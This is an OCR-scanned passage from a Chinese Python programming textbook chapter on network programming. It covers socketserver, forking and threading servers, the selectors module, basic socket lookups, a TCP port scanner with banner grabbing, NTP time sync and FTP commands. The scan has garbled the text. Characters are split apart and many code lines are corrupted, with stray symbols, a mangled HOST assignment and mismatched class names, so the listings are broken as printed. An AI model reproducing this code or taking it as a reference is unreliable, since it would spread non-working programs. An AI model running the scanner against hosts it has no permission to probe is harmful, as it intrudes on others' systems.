服务 器 类 支持 下 面 的 类 变量 。 

© BaseServer. allow_reuse_address: 服务 器 是 否 人 允许 地 址 的 重用 。 默 认为 False, 并 且 
可 在 子 类 中 更 改 。 

9 BaseServer. request_queue_size: 请 求 队列 的 大 小 。 如 果 单 个 请 求 需要 很 长 的 时 间 
来 处 理 , 服 务 器 忙 时 请 求 被 放置 到 队列 中 ,最 多 可 以 放 request_queue_size 个 。 一旦 
队列 已 满 ,来 自 客户 端的 请 求 将 得 到 Connection denied 错误 。 默 认 值 通常 为 5, 但 
可 以 被 子 类 覆盖 。 

9 BaseServer. socket_type: 服务 器 使 用 的 套 接 字 类 型 ,socket. SOCK_STREAM 和 
socket. SOCK_DGRAM 等 。 

9 BaseServer. timeout: 超时 时 间 ,以 s 为 单位 ,或 None 表示 没有 超时 。 如 果 handle_ 
request() 在 timeout 内 没有 收 到 请 求 , 将 调用 handle_timeout() 方 法 。 

下 面 方法 可 以 被 子 类 重 载 ,它们 对 服务 器 对 象 的 外 部 用 户 没 有 影响 。 

0 BaseServer. finish_request(): 实际 处 理 RequestHandlerClass 发 起 的 请 求 并 调用 其 
handle() 方 法 。 常 用 。 

2 BaseServer. get_request() : 接受 socket 请 求 ,并 返回 二 元 组 包含 要 用 于 与 客户 端 通 
信 的 新 Socket 对 象 ,以 及 客户 端的 地 址 。 

© BaseServer. handle_error(request, client_address): 如 果 RequestHandlerClass 的 
handle() 方 法 抛 出 异常 时 调用 。 默 认 操 作 是 打印 traceback 到 标准 输出 ,并 继续 处 理 
其 他 请 求 。 

2 BaseServer. handle_timeout(); 超时 处 理 。 默 认 对 于 forking 服务 器 是 收集 退出 的 
子 进程 状态 ,threading 服务 器 则 什么 都 不 做 。 

© BaseServer. process_request(request, client_address): 调用 finish_request() 方 法 创 
建 RequestHandlerClass 的 实例 。 如 果 需 要 ,此 功能 可 以 创建 新 的 进程 或 线程 来 处 
理 请 求 ,ForkingMixIn 和 ThreadingMixIn 类 做 到 这 点 。 常 用 。 

9 BaseServer. server_activate(): 通过 服务 器 的 构造 函数 来 激活 服务 器 。 默 认 的 行为 
只 是 监听 服务 器 套 接 字 。 可 重 载 。 

9 BaseServer. server_bind(): 通过 服务 器 的 构造 函数 中 调用 绑 定 Socket 到 所 需 的 地 
址 。 可 重 载 。 

2 BaseServer. verify_request(request， client_address): 返回 一 个 布尔 值 ,如 果 该 值 为 


第 11 章 ”网 络 编程 (203 
True, 则 该 请 求 将 被 处 理 ; 反之 请 求 将 被 拒绝 。 此 功能 可 以 重 写 来 实现 对 服务 器 的 
访问 控制 。 默 认 的 实现 始终 返回 True。client_address 可 以 限定 客户 端 ,比如 ,只 处 
理 指 定 IP 区 间 的 请 求 。 常 用 。 
3. 请 求 处 理 器 
处 理 器 接收 数据 并 决定 如 何 操作 。 它 负责 在 socket 层 之 上 实现 协议 (ie.、HTTP、 
XML-RPC 或 AMQP) , 读 取 数据 ,处 理 并 写 反 应 。 可 以 重 载 的 方法 如 下 。 
9 setup(): 准备 请 求 处 理 。 默 认 什么 都 不 做 ,StreamRequestHandler 中 会 创建 文件 类 
似 的 对 象 以 读 / 写 Socket。 
2 handle() : 处 理 请 求 。 解 析 传 人 的 请 求 , 处 理 数据 ,并 发 送 响应 。 默 认 什 么 都 不 做 。 
常用 变量 : self. request self. client_address self. server。 
2 finish(): 环境 清理 。 默 认 什么 都 不 做 ,如 果 setup 产生 异常 ,不 会 执行 finish 。 
通常 只 需 重 载 handle。self. request 的 类 型 和 数据 报 或 流 的 服务 不 同 。 对 于 流 服务 ， 
self. request 是 Socket 对 象 ; 对 于 数据 报 服务 ,self. request 是 字符 串 和 socket。 可 以 在 子 
类 StreamRequestHandler 或 DatagramRequestHandler 中 重 载 , 重 写 setup() 方 法 和 finish() 方 
法 ,并 提供 self. rfile 和 self. wfile 属性 。self. rfile 和 self. wfile 可 以 读 取 或 写 入 ,以 获得 请 
求 数据 或 将 数据 返回 到 客户 端 。 
使 用 SocketServer 模块 编写 的 TCP 服务 器 端 代码 : 
例 [chl1-2-tcpserver. py】 


1. #! /usr/bin/env python 

2 from socketserver import TCPServer , StreamRequestHandler 

3. 井 从 socketserver 导入 需要 的 类 ,这 里 使 用 了 一 行 导 入 多 个 类 的 方式 

4. from time import ctime 

5 Wer = ™ 

6 PORT = 1234 

A ADDR = (HOST, PORT) 

8. class MYRequestHandler(StreamRequestHandler) : 

9 def handle(self) : 

10. print (' 已 经 连接 :'，self. client address) 

Er self.wfile.write(('[%s] %s'% (ctime(), self. rfile. readline().decode("UTF— 
8"))).encode("UTF — 8")) 

3 这 里 定义 了 一 个 MyRequestHandler 类 , 它 是 StreamRequestHandler 的 子 类 

13， 井 并 重 写 了 handle( ) 函数 

14. 井 该 函 数 显示 连接 的 客户 端的 信息 ,接收 客户 端 传 来 的 信息 ,并 把 时 间 码 和 数据 传 回 客 户 端 
15. tcpServ = TCPServer(ADDR, MyRequestHandler) 

16. # 用 指定 的 主机 信息 和 请 求 处 理 类 创建 TCP 服务 端 

17. print ( "等 待 新 的 连接 …… ') 

18. tcpServ. serve_forever() 


19， 井 进入 等 待 客户 端 连 接 请 求 ,处 理 客 户 端 传输 数据 的 循环 中 


相应 的 TCP 客户 端 代码 : 
例 [chl11-2-tcpclient. py】 


s ! /usr/bin/env python 
coding:utf -8 
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3 from socket import * 

4 BUFSIZE = 1024 

5. # 每 次 都 要 创建 新 的 连接 

6. while True: 

学 tcpClient = socket (AF_INET, SOCK_STREAM) 
8 tcpClient. connect( ("localhost", 1234)) 
9. data = input(">") 

10. if not data: 


i: break 

1 data = data+ \r\n' 

kk tcpClient. send( data. encode( 'UTF ~ 8')) 

14. datal = tcpClient. recv(BUFSIZE). decode( 'UTF ~ 8') 
15; if not datal: 

6: break 

hy print(datal. strip()) 

18. tcpClient. close( ) 

服务 器 端的 输出 : 


D:\pythonproj > Python chll - 2 - tcpserver.py 
等 待 新 的 连接 …… 

已 经 连接 : ('127.0.0.1', 61116) 

已 经 连接 : ('127.0.0.1', 61117) 

已 经 连接 : ('127.0.0.1', 61118) 


客户 端的 输出 : 


D:\pythonproj > python chl1l — 2 - tcpclient. py 

> abcdefg 

[Sat May 2 11:28:48 2015] abcdefg 

> 庆祝 "五 一 "国际 劳动 节 

[Sat May 2 11:29:07 2015] 庆祝 "五 一 "国际 劳动 节 


上 面 的 通信 实验 中 ,服务 器 端 与 客户 端 进行 通信 时 ,只 能 与 一 个 客户 端 进行 通信 ,其 他 
客户 端 是 不 能 插入 进来 进行 通信 的 ,只 有 当 通 信和 结束 后 ,服务 器 端 才 可 以 与 其 他 的 客户 端 进 
行 通信 , 称 这 种 通信 方式 为 阻塞 模式 。 如 果 要 提高 通信 效率 ,Python 中 必须 采用 异步 通信 
模式 。 异 步 通信 模式 下 ,服务 器 端 不 需要 单独 处 理 每 个 客户 端 发 出 的 通信 请 求 , 也 不 会 因为 
某 个 客户 端 接收 或 处 理 数 据 时 花 了 很 长 时 间 , 而 使 整个 通信 过 程 停滞 。 异 步 通信 模式 包括 : 
Fork 通信 和 模式、Threading 通信 模式 、Select 通信 和 模式。 下面 就 来 分 别 介 绍 这 三 种 通信 
模式 。 


11.2.1 使 用 ForkingMixIn 实现 异步 通信 


服务 器 端 与 一 个 客户 端 通信 时 , 另 一 个 客户 端 发 出 通信 请 求 ,异步 通信 模式 下 ,服务 器 
端 不 能 阻塞 于 当前 通信 环境 下 ,必须 找到 一 种 方式 ,使 服务 器 端 能 够 处 理 多 个 客户 端的 通信 
请 求 。Fork 通信 模式 提供 了 一 种 基于 进程 的 解决 方式 。 当 主 进程 接 到 一 个 通信 请 求 时 , 主 
进程 会 生成 一 个 进程 专门 处 理 通信 请 求 , 主 进程 则 继续 监听 客户 端的 通信 请 求 。 因 为 主 进 
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程 与 子 进程 同时 运行 ,所 以 不 会 出 现 阻 塞 的 情况 。 
例 [chl11-2-1-fork. py】 


1. from socketserver import (TCPServer as TCP, StreamRequestHandler as SRH, ForkingMixIn as 
FMI) 

2. 井 导 和 人 需要 的 类 

3 from time import ctime 

4 HOST = "" 

5. PORT = 1234 

6. ADDR = (HOST, PORT) 

时 class Server(FMI, TCP): 

8. 井 自 定义 Server 类 , 它 继承 了 ForkingMixIn、TCPServer, 这 样 , Server 类 既 提 供 了 流 数据 传输 
服务 ,又 提供 了 多 连接 处 理 功能 


9. pass 

10. class MYRequestHandler(SRH) : 

1 def handle(self) : 

Ey 区 print(' 已 经 连接 :',，self. client_address) 

13; self.wfile.write(('[%s] %s'% (ctime(), self.rfile. readline().decode("UTF— 
8"))).encode("UTF — 8")) 

14. 


15，tcpServ = Server(ADDR, MyRequestHandler) 

16， 井 生成 Server 类 对 象 , 连 接 的 主机 地 址 是 ADDR, 连接 的 处 理 器 是 MYRequestHandler 
17，print( "等 待 新 的 连接 …… ') 

18. tcpServ. serve_forever() 


19. 进入 等 待 客户 端 连 接 请 求 .处 理 客户 端 传 输 数 据 的 循环 中 
在 Windows 中 不 支持 Forking, 运 行 以 上 程序 时 ,会 出 现 以 下 异常 : 
D:\pythonproj > Python ch1l1 - 2—1- fork.py 


等 待 新 的 连接 … 


Exception happened during processing of request from ('127.0.0.1', 60936) 
Traceback (most recent call last) : 
File "C:\PYython34\]lib\socketserver. py", line 305，in _handle_request_noblock 
self. process_request(request, client address) 
File "C:\Python34\1ib\socketserver. py", line 580, in process_request 
pid = os.fork() 
AttributeError: 'module' object has no attribute 'fork’ 


在 Linux 上 运行 正常 ,下 面 是 程序 在 CentOS 6. 6 十 Python 3. 4. 3 环境 下 的 运行 情况 。 
服务 器 端 运 行 结果 : 


[root@Python - server testuser]# python3 chll -2—1- fork.py 


等 待 新 的 连接 …… 

已 经 连接 : ('127.0.0.1', 52517) 
已 经 连接 : ('127.0.0.1', 52518) 
已 经 连接 : ('127.0.0.1', 52519) 
已 经 连接 : ('127.0.0.1', 52520) 
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客户 端 运行 结果 : 

[root@Python - server testuser]# python3 chll - 2 - tcpclient.py 
> abcdefg 

[Sat May 2 15:08:53 2015] abcdefg 

> qwerty 

[Sat May 2 15:09:02 2015] qwerty 

>54321 


[Sat May 2 15:09:14 2015] 54321 
ES 


[root@Python - server testuser]# 


11.2.2 使 用 ThreadingMixIn 实现 异步 通信 


上 面 的 ForkingMixIn 通信 模式 ,是 以 进程 方式 来 处 理 客 户 端的 通信 请 求 的 。 由 于 进程 
方式 对 资源 的 要 求 较 高 ,当主 机 是 多 处 理 器 并 且 客 户 端 数 量 不 多 时 ,效率 还 是 较 高 的 ; 但 当 
客户 端 非常 多 时 ,会 带 来 性 能 问题 ,并且 Windows 也 不 支持 这 种 方式 。 

线程 是 轻 量 级 的 , 它 具 有 进程 无 法 比拟 的 优势 , 当 连 接 请 求 较 多 时 ,可 以 使 用 线程 的 方 
式 来 处 理 。 服 务 器 端 有 一 个 主线 程 , 它 监听 着 客户 端的 连接 请 求 , 当 有 连接 请 求 来 临时 , 它 
会 生成 一 个 子 线程 去 处 理 这 个 连接 请 求 ,主线 程 仍然 监听 是 否 有 新 的 客户 端的 连接 请 求 。 
这 样 服务 器 端 会 在 不 同 的 线程 中 独立 地 处 理 连 接 请 求 ,不 会 形成 阻塞 ,非常 便捷 高 效 。 

例 [chl11-2-2-Thread. py】 


1. from socketserver import (TCPServer as TCP, StreamRequestHandler as SRH, ThreadingMixIn as 


2. # 导 入 需要 的 类 
3. from time import ctime 
4. HOST = "" 
5. PORT = 1234 
6. ADDR = (HOST, PORT) 

7. class Server(TMI, TCP): 

8. ## 自 定义 Server 类 , 它 继承 了 ThreadingMixIn、TCPServer, 这 样 , Server 类 既 提供 了 流 数 据 传 
输 服务 ,又 提供 了 多 连接 处 理 功能 

9, pass 

10. class MYRequestHandler(SRH) : 

是 和 def handle(self) : 


12. print(' 已 经 连接 :',，self. client address) 

有 self. data = self. rfile.readline(). strip().decode('UTF — 8') 

14. # self.rfile 是 一 个 被 处 理 器 创建 的 类 似 于 文件 的 对 象 

1 井 我 们 可 以 用 readline( ) 等 代替 recv() 

16. self.wfile.write(('[%s] %s'% (ctime(), self.data)).encode("UTF- 8")) 
a # 使 用 流 , 一 次 读 一 行 


18. tcpServ = Server(ADDR, MyRequestHandler) 

19. # 生 成 Server 类 对 象 ,连接 的 主机 地 址 是 ADDR, 连接 的 处 理 器 是 MyRequestHandler 
20，print( ' 等 待 新 的 连接 … ') 

21. tcpServ. serve forever() 


22. 井 进 入 等 待 客 户 端 连接 请 求 , 处 理 客户 端 传输 数据 的 循环 中 
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11.2.3 使 用 Selects 模块 


在 大 型 的 网 络 应 用 程序 中 ,客户 端 可 能 会 有 几 百 个 、 几 千 个 其 至 几 万 个 ,如 果 为 每 个 连 
接 请 求生 成 一 个 进程 或 线程 ,将 是 不 切实 际 的 ,因为 每 个 进程 或 线程 都 消耗 一 定 的 内 存 及 
CPU 时 间 。 这 时 就 需要 更 轻便 地 处 理 连 接 方式 。Python 3. 4 中 新 增 了 高 级 模块 Selects， 
较 之 以 前 的 低级 Select 模块 简单 了 很 多 。 该 模块 能 够 进行 高 级 高 效 的 1/O 复 用 ,鼓励 用 户 
使 用 它 ,除非 用 户 要 进行 操作 系统 级 的 控制 。 

该 模块 中 定义 了 BaseSelector 抽象 基 类 和 几 个 具体 的 应 用 类 (KqueueSelector、 
EpollSelector...) ,它们 等 待 着 多 个 文件 对 象 中 就 绪 的 1/O 通知 。DefaultSelector 是 当前 平 
台中 最 高 效 的 应 用 ,也 是 广大 用 户 的 默认 选择 。 

类 的 层次 关系 如 下 。 


BaseSelector 

+-— SelectSelector 

+-— PollSelector 

+-—— EpollSelector 

+-—— KqueueSelector 

常量 如 下 。 

2 EVENT_READ: 用 于 读 。 

2 EVENT_WRITE: 用 于 写 。 

selectors 模块 中 的 类 如 下 。 

9 SelectorKey 类 : SelectorKey 是 一 个 命名 的 元 组 ,用 来 关联 文件 对 象 与 文件 描述 符 
及 事件 拖 码 与 相关 数据 。 几 个 BaseSelector() 方 法 都 会 返回 它 。 

2 BaseSelector 类 : 它 被 用 于 等 待 多 个 文件 对 象 的 1/O 事件 , 它 支持 文件 流 的 注册 、 注 

销 , 等 待 这 些 流 上 的 I/O 事件 ,设置 超时 选项 , 它 是 抽象 类 ,因此 不 能 实例 化 。 

DefaultSelector 类 : 默认 的 选择 器 类 ,是 当前 平台 下 最 高 效 的 应 用 。 

SelectSelector 类 : 派生 于 selector。 

PollSelector 类 : 派生 于 selector。 

EpollSelector 类 : 派生 于 selector。 

KqueueSelector 类 : 派生 于 selector。 

BaseSelector 类 的 方法 如 下 。 

register(fileobj，events，data 一 None) : 注册 文件 对 象 .监视 它 的 IIO 事件 。 

unregister(fileobj) : 从 选择 器 中 注销 文件 对 象 。 文 件 对 象 在 关闭 之 前 应 该 注销 。 

modify(fileobj，events，data 一 None) : 修改 注册 的 文件 对 象 的 事件 或 关联 数据 。 

select(timeout 二 None): 等 待 某 些 注册 的 文件 对 象 变 为 就 绪 状 态 或 超时 。 

close() : 关闭 选择 器 。 

get_key(fileobj) : 返回 和 某 文件 对 象 关联 的 键 值 。 

get_map(): 返回 文件 对 象 到 选择 器 键 值 的 映射 。 

例 [chl11-2-3-selects. py】 


Oooo 


© 0 0 0 0 .00 


1. import selectors 
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2 import socket 

3. from time import ctime 

4. sel = selectors.DefaultSelector() 

5. 井 使 用 默认 选择 器 作为 选择 器 

6. def accept(sock, mask): 

7 conn, addr = sock.accept() # Should be ready 
8 print('accepted', conn, 'from', addr) 

9. conn. setblocking(False) 

10. sel. register(conn, selectors.EVENT READ, read) 


EL 

12. def read(conn, mask): 

3 data = conn. recv(1000). decode("UTF — 8") 并 接收 数据 , 它 应 该 是 处 于 就 绪 状 态 
14. if data: 

和 print('echoing', repr(data), ‘to', conn) 

16. data = "["+ctime()+"]"+data 

I conn. send( data. encode( 'UTF — 8')) 并 发 送 数 据 , 希 望 它 不 会 被 阻塞 
18. else: 

19. print('closing'，conn) 

20. sel. unregister(conn) # 注 销 连 接 

21; conn. close( ) # 关 闭 连 接 

22. 


23. sock = socket. socket() 

24. sock.bind(('localhost', 1234)) 

25. sock. listen(100) 

26. sock. setblocking(False) 

27. sel.register(sock, selectors.EVENT READ, accept) 
28， 间 为 选择 器 注册 指定 的 套 接 字 .accept( ) 函数 

29. while True: 


30. events = sel. select() 

31, for key, mask in events: 

3 callback = key. data 

3 callback(key. fileobj, mask) 


11.3 网络 编程 基础 


11.3.1 Python 网 络 编程 基础 


要 使 用 Python 进行 网 络 编程 ,有些 功能 应 该 是 应 知 应 会 的 ,如 获取 主机 名 ,根据 主机 
名 获取 主机 IP ,根据 域名 获取 IP 地 址 、 根 据 端口 及 协议 获取 服务 名 、 获 取 并 同步 网 络 时间 
等 。 下 面 就 针对 这 些 基 本 网 络 功能 进行 案例 解析 。 

1. 获取 主机 名 


>>> import socket 
>>> hostname = socket. gethostname() 
>>> print(hostname) 


hadoop - PC 
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2. 根据 主机 名 获取 主机 IP 


>>> ipaddress = socket. gethostbyname(hostname) 
>>> print(ipaddress) 


192.168.1.1 


3. 根据 域名 获取 IP 地 址 


>>> socket. gethostbyname( "www. baidu. com") 


"119.75.218.70" 


4. 根据 端口 及 协议 获取 服务 名 


>>> port = 80 


>>> protocolname = "tcp' 


>>> print( 'the service is %s on port: %s' $% (socket.getservbyport(port, protocolname),port) ) 


the service is http on port: 80 


11.3.2 基于 Socket 的 网 络 扫描 


在 网 络 安全 领域 网 络 扫描 是 一 项 基础 工作 ,通过 网 络 扫 描 , 可 以 知道 某 主机 是 否 在 运 
行 , 该 主机 的 操作 系统 是 何 种 类 型 ; 通过 扫描 特定 端口 ,可 以 知道 该 主机 提供 了 什么 服务 ， 
提供 服务 的 软件 是 什么 ,而 这 些 信 息 对 于 网 络 安全 评估 和 网 络 渗透 都 是 非常 重要 的 信息 。 
扫描 的 过 程 和 原理 是 这 样 的 : 首先 输入 主机 和 端口 号 ,构成 互联 网 地 址 ,通过 TCP 套 接 字 
连接 该 主机 的 特定 端口 , 若 连接 成 功 , 则 说 明 该 主机 的 端口 是 开放 的 , 正 向 客户 端 提 供 服务 
若 连接 时 发 生 异 常 , 则 说 明 该 主机 的 端口 是 关闭 的 。 为 了 获取 该 端口 上 提供 服务 的 类 型 ,给 
该 端口 发 送 垃圾 信息 ,并 读 取 该 主机 上 应 用 发 回 的 Banner, 据 此 做 出 进一步 的 判断 。 

例 [chll 3 2 _scan. py】 


#coding:utf—8 

#ch8 3 1 scan.py 

from socket import * 

from optparse import OptionParser 


def socketscan(tgtip, tgtport): 

sktconn = socket(AF_INET, SOCK_STREAM) 

try: 
sktconn. connect( (tgtip, tgtport)) 
print("%s:%s 正在 开放 " % (tgtip, tgtport)) 

except Exception as e: 
print("%s:%s 关闭 了 "Ss% (tgtip,tgtport)) 
#print(e) 

finally: 
sktconn. close() 


. def main(): 


usage = "python % prog [options]" 
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18. parser = OptionParser(usage) 

3 parser. add option('— H',type= 'string', dest = 'Host', help= 'specify target host') 
20. parser.add option("— p",type= 'int', dest = 'port', help = "specify target port") 
21. (options, args) = parser.parse args() 

2 if (options. Host is None) | (options. port is None): 

< 辣 parser. print_help() 

24. else: 

25。 socketscan(options. Host, options. port) 

26. 

27. if _name ==" main ": 

28. main() 


(可 说 明 : 第 6 行 ,定义 socketscan(tgtip,tgtport) 函 数 ,进行 网 络 连接 测试 。 

第 7 行 ,构造 一 个 使 用 互联 网 地 址 和 TCP 流 的 套 接 字 对 象 。 

第 9 行 ,使 用 该 套 接 字 进 行 连接 , 若 未 发 生 异 常 , 说 明 该 地 址 和 端口 是 开放 的 。 

第 10 行 ,打印 开放 信息 , 若 发 生 异常 , 则 说 明 该 地 址 和 端口 是 关闭 的 。 

第 12 行 ,打印 端口 关闭 信息 。 

第 14 行 ,定义 异常 的 finally 处 理 , 关 闭 网 络 连 接 。 

第 16 行 ,定义 main() 函 数 ,处 理 命令 行 参数 。 

第 17 一 21 行 ,使 用 parser 处 理 命令 行 参 数 ,parser 是 功能 强大 且 易 于 使 用 的 命令 行 处 
理 模块 。 

第 17 行 ,定义 了 一 个 usage 字符 串 , 命 令 行 参数 错误 时 ,可 以 打印 该 字符 串 , 作 为 帮助 。 

第 18 行 ,生成 OptionParser 对 象 parser。 

第 19 行 ,使 用 add_option() 函 数 添加 命令 行 选项 ,第 一 个 参数 为 命令 行 选 项 ,type 指定 
参数 类 型 ,dest 指定 对 参数 的 描述 ,help 指定 参数 的 帮助 信息 。 

第 21 行 ,获取 命令 行 参数 ,如 options. Host、options. port。 

第 22 行 , 判 断 命令 行 参 数 是 否 为 空 , 若 为 空 , 通 过 parser. print_help() 函 数 打印 帮助 信 
息 ; 若 不 为 空 , 则 调用 socketscan() 函数 进行 网 络 扫描 。 


11.3.3 获取 应 用 的 Banner 


连接 服务 器 端 以 后 ,能 够 知道 在 服务 器 端的 该 端口 正 运行 着 一 个 服务 ,这 是 个 什么 样 的 
服务 呢 ? 需要 更 多 的 信息 来 确定 服务 的 类 型 ,这 时 可 以 向 服务 器 端 发 送信 息 ,然后 接收 其 发 
送 过 来 的 信息 ,根据 该 信息 ,可 以 更 进一步 地 确定 服务 的 类 型 。 

在 Socket 类 中 有 send() 方 法 , 它 向 对 方 发 送 一 段 字 节 码 ; recv(BuffSize) 方 法 从 对 方 接 
收 BuffSize 字 节 数 的 字 节 码 。 根 据 接收 的 数据 ,可 以 进一步 确定 服务 的 类 型 了 。 把 11. 3. 2 小 
节 中 的 程序 稍 加 修改 即 可 实现 获取 Banner 的 功能 。 这 里 只 列 出 socketscan() 函数 。 

例 [chll 3 3_banner. py】 

1. def socketscan(tgtip, tgtport): 

2 sktconn = socket(AF_INET, SOCK STREAM) 

3. try: 

4 sktconn. connect( (tgtip, tgtport)) 
5 print(" 名 s: 名 s 正在 开放 " % (tgtip, tgtport)) 
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6 sendstr = 'send me some informationNrNn' 
sktconn. send( sendstr. encode( )) 

8. accept_data = sktconn. recv(1024) 

9 print(accept data. decode()) 

10. except 了 Exception as e: 

和 print("%s:%s 关闭 了 "s% (tgtip, tgtport)) 
1 Print(e) 

2 finally: 

14. sktconn. close() 


村 说 明 : 第 6 行 ,定义 了 一 个 要 发 送 的 字符 串 。 

第 7 行 ,通过 Socket 的 send() 方 法 向 对 方 发 送 数 据 。 因 发 送 的 是 字 节 码 , 所 以 这 里 用 
encode() 方 法 将 字符 串 编 码 为 字 节 码 。 

第 8 行 ,从 对 方 接收 数据 ,数据 类 型 为 字 节 码 。 

第 9 行 ,用 decode() 函 数 将 接收 到 的 字 节 码 解 码 为 字符 串 。 

扫描 Nginx 服务 器 ,用 下 列 方式 运行 程序 : 


> python chll 3_3 banner.py ~ H192.168.1.106 -p80 


在 服务 器 端正 运行 着 Nginx Web 服务 器 ,接收 到 的 是 以 下 信息 : 


HTTP/1. 1 400 Bad Request 

Server: nginx/1.10.0 (Ubuntu) 
Date: Wed, 04 Jan 2017 08:23:14 GMT 
Content - Type: text/html 

Content - Length: 182 

Connection: close 


从 接收 到 的 信息 可 以 知道 ,服务 器 为 Nginx 1. 10.0, 运 行 于 Ubuntu 操作 系统 上 。 
扫描 FileZilla Server 服务 器 ,用 下 列 方式 运行 程序 : 


> Python chll_3_3_banner.py -日 192.168.1.200 ~p21 
接收 到 的 是 以 下 信息 : 


220 - FileZilla Server version 0.9.46 beta 
220 - written by Tim Kosse (tim.kosse@filezilla- project. org) 
220 Please visit http://sourceforge.net/projects/filezilla/ 


从 接收 到 的 信息 可 以 推断 出 ,服务 器 为 FileZilla Server, 版 本 号 为 0. 9. 46 beta。 
11.3.4 获取 并 同步 网 络 时间 


许多 网 络 设备 需要 有 精确 的 时 间 , 这 时 就 需要 用 到 网 络 时 间 协 议 (Network Time 
Protocol,NTP) 在 客户 端 和 服务 器 端 之 间 进 行 时 间 同 步 ,NTP 是 由 美国 德 拉 瓦 大 学 的 
David L. Mills 教授 于 1985 年 提出 ,设计 用 来 在 互联 网 上 使 不 同 的 机 器 能 维持 相同 时 间 
的 一 种 通信 协议 。NTP 估算 封包 在 网 络 上 的 往返 延迟 ,独立 地 估算 计算 机 时 钟 偏 差 , 从 
而 实现 在 网 络 上 的 高 精准 度 计 算 机 校 时 。Python 中 使 用 NTP 需要 安装 ntplib, 安 装 命 


212) Python 编程 入 门 与 案例 详解 


> pip install ntplib 


笔者 在 线 安装 的 版 本 是 ntplib-0. 3. 3, 例 程 如 例 Kch11_3_4_ntpset. py 所 示 。 
例 [chll1 3_4_ntpset. py】 


1 import os 
党 import time 
3 import datetime 
4 import ntplib 
5. c= ntplib.NTPClient() 
6. response = c.request('pool.ntp.org') 
7. ts = response.tx time 井 精准 时 间 
8. _date = time.strftime('%Y— %m- %d',time.localtime(ts)) 
9. _time = time. strftime('%X',time.1localtime(ts)) 
10. os. system( 'date {} && time {}'.format(_date, time)) 
#Windows 下 执行 date 设置 日 期 ,执行 time 设置 时 间 
11. #print(datetime. datetime. fromtimestamp(response. tx_ time)) 
12. print("%s %s"%( date, time)) 


程序 运行 结果 : 


2017-08- 08 16:12:11 


11.4 FTP 客户 端 编程 


11.4.1 FTP 模式 及 命令 


FTP(File Transfer Protocol, 文 件 传输 协议 ) 是 互联 网 中 广泛 使 用 的 一 种 文件 传输 协 
议 , 由 Jonathon 和 Joyce Reynolds 开发 ,并 被 记录 在 RFC(Request for Comment)959 号 文 
件 中 ,主要 应 用 于 两 台 计 算 机 之 间 传 输 文件 。 在 早期 的 互联 网 中 ,FTP 是 主要 的 文件 传输 
协议 。 

FTP 客户 从 客户 端 登录 服务 器 时 ,必须 用 用 户 名 和 密码 才能 登录 ,如 果 以 “匿名 ” 
(Anonymous) 方 式 登 录 , 密 码 一 般 为 空 , 匿 名 方式 能 够 访问 的 资源 一 般 来 说 都 是 公共 资源 ， 
匿名 用 户 一 般 只 能 读 取 而 没有 其 他 权限 ,而 以 特定 用 户 名 和 特定 密码 登录 时 ,权限 较 大 。 

下 面 以 命令 行 方式 说 明 FTP 的 工作 过 程 。 


C:\Users\hadoop. hadoop - PC> ftp 192.168.1.5 
连接 到 192. 168. 1. 5。 


220 Serv— U FTP Server v10.0 ready... 

用 户 (192. 168.1.5:(none)): anonymous 

331 User name okay, please send complete E— mail address as password. 
密码 :( 回 车 ) 

230 User logged in, proceed. 
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ftp > di 

200 PORT command successful. 

150 Opening ASCIT mode data connection for /bin/1s. 

—Iw-Iw-rw— 1 user group 430744 Mar 31 21:41 aa. txt 
—Iw—-Iw-Irw— 1 user group 7 Mar 31 09 :55 test. txt 
-rw-rw-rw- luser group 17 Mar 31 10:50 upload. txt 
226 Transfer complete. 195 bytes transferred. 0.19 KB/sec. 


ftp: 收 到 195B, 用 时 0. 00s195000. 00KB/s。 


ftp> del aa. txt 

250 DELE command successful. 

ftp> rename upload. txt nomal. txt 

350 File or directory exists, ready for destination name. 

250 RNTO command successful. 

ftp> get test. txt 

200 PORT command successful. 

150 Opening BINARY mode data connection for test. txt (7 Bytes). 
226 Transfer complete. 7 bytes transferred. 0.01 KB/sec. 


ftp: 收 到 7B, 用 时 0. 01s0. 47KB/s。 


ftp > put c:\aa. txt 

200 PORT command successful. 

150 Opening BINARY mode data connection for aa. txt. 

226 Transfer complete. 430, 744 bytes transferred. 1,171.72 KB/sec. 


ftp :发 送 430744B, 用 时 0. 00s430744000. 00KB/s。 


ftp > quit 

221 Goodbye，closing session. 

(1) 用 “服务 器 IP”“ 用 户 名 ”和 ”密码 ?登录 远程 FTP 服务 器 。 
(2) 执行 FTP 命令 ,包括 cd ,dir del ,rename get、put 等 。 
(3) 执行 quit、bye 登录 FTP 服务 器 。 


人 从 注意 : 本 例 中 "匿名 "用 户 具 有 写 权限 ,一 般 的 匿名 用 户 是 不 分 配 写 权 限 的 。 


FTP 客户 端 和 服务 器 端 都 使 用 两 个 TCP 端口 进行 通信 ,一 个 是 命令 和 控制 端口 (21 号 
端口 ); 另 一 个 是 用 于 传输 数据 的 端口 (20 号 端口 ) 。 

FTP 服务 器 有 两 种 服务 模式 : 主动 模式 和 被 动 模式 。 

主动 模式 下 : 首先 ,客户 端 从 一 个 任意 的 非特 权 端 口 N( 小 于 或 等 于 1024) 连 接 到 FTP 
服务 器 的 命令 端口 (21 号 端口 )。 其 次 ,客户 端 开始 监听 端口 N 十 1, 并 发 送 FTP 命令 “port 
N 十 1” 到 FTP 服务 器 。 最 后 服务 器 会 从 它 自己 的 数据 端口 (20) 连 接 到 客户 端 指定 的 数据 
端口 (N 十 1)。 

被 动 模式 下 : 命令 连接 和 数据 连接 都 由 客户 端 发 起 。 

当 开启 一 个 FTP 连接 时 ,客户 端 打开 两 个 任意 的 非特 权 本 地 端口 N( 大 于 1024) 和 
N 十 1。 第 一 个 端口 连接 服务 器 的 21 端口 ,但 与 主动 方式 的 FTP 不 同 , 客 户 端 不 会 提交 
PORT 命令 并 允许 服务 器 来 回 连 它 的 数据 端口 ,而 是 提交 PASV 命令 。 这 样 做 的 结果 是 服 
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务 器 会 开启 一 个 任意 的 非特 权 端 口 P( 大 于 1024) ,并 发 送 PORT P 命令 给 客户 端 。 然 后 客 
户 端 发 起 从 本 地 端口 N 十 1 到 服务 器 端口 P 的 连接 用 来 传送 数据 。 


11.4.2 ftplib. FTP 方法 


Python 中 封装 的 Ftplib 模块 提供 了 对 FTP 的 支持 , 表 11-1 所 示 即 是 ftplib. FTP 的 
方法 。 


表 11-1 ftplib. FTP 的 方法 
























































方 法 描 述 
login(user 一 'anonymous',password 一 ") | 以 用 户 名 和 密码 登录 FTP 服务 器 
2 设置 FTP 模式 , 若 参数 为 True, 则 设置 为 被 动 模式 ; 若 参 数 
一 为 False, 则 设置 为 主动 模式 
set_debuglevel(level) 设置 调试 级 别 ,默认 的 调试 级 别 为 0 
